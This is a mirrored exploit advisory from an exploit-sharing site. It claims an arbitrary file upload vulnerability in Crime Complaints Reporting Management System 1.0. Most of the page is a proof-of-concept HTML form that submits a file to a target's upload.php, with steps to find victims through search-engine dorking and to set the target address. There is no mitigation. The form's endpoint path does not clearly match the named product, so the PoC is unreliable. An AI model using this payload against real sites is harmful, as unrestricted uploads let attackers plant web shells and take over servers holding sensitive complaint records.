Share
## https://sploitus.com/exploit?id=PACKETSTORM:181360
=============================================================================================================================================
| # Title : Crime Complaints Reporting Management System 1.0 arbitrary file upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/complaints-report-management-system.zip |
=============================================================================================================================================
poc :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] Line : 109 Set your Target
[+] Save As poc.html
[+] payload :
<<div class="modal-content" style="font-size: 14px; font-family: Times New Roman;color:black;">
<div class="modal-header" style="background:#222d32">
<button type="button" class="close" data-dismiss="modal">ร</button>
<h4 class="modal-title" style="font-weight: bold;color: #F0F0F0"><center>
SYSTEM INFORMATION INITIALISATION
</center></h4>
</div>
<form method="post" action="http://127.0.0.1/Staff_registration/upload.php" enctype="multipart/form-data">
<div class="modal-body">
<center>
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;"> Org Name:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgname"></span></p>
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;"> Phone:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgphone"></span></p>
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;"> Email:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgemail"></span></p>
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;"> Website:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgwebsite"></span></p>
<p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">Active Year:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgyear"></span></p>
Attach Organisation Logo:(<h7 style="color:red">Make sure it is a transparent image</h7>)<input name="filed" type="file" id="filed">
<input type="hidden" name="page" value="admin.php">
</center>
</div>
<div class="modal-footer">
<input type="submit" class="btn btn-success" value="Finish" id="addmember" name="orginitial">
<button type="button" class="btn btn-success" data-dismiss="modal">Close</button>
</div>
</form></div>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================